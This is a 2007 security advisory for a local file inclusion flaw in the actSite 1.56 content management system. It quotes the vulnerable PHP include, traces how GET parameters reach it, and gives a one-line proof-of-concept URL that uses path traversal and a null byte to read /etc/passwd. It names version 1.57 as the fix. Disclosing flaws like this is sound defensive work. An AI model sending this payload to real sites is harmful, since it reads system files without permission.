actSite 1.56 (news.php) Local File Inclusion Vulnerability

2007-10-01 00:00:00

\#'#/

(-.-)

-----------------oOO---(_)---OOo-----------------

| actSite v1.56 (news.php) Local File Inclusion |

| coded by DNX |

-------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC:

- http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

- So why we can inject code in a post variable per url? Let's do some research...

- In phpinc/news.php line 36

require_once('../config.php');



- Let's take a look in 'config.php' line 22

if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");



- Ok, let's take a look in 'phpinc/inc/csb.php' line 18

if(getenv('REQUEST_METHOD') == "GET") {

foreach($_GET as $key => $val) {

$_POST[$key] =& $_GET[$key];

}

}



[!] Solution: Install security update to v1.57

#

Fixes

No fixes

In order to submit a new fix you need to be registered.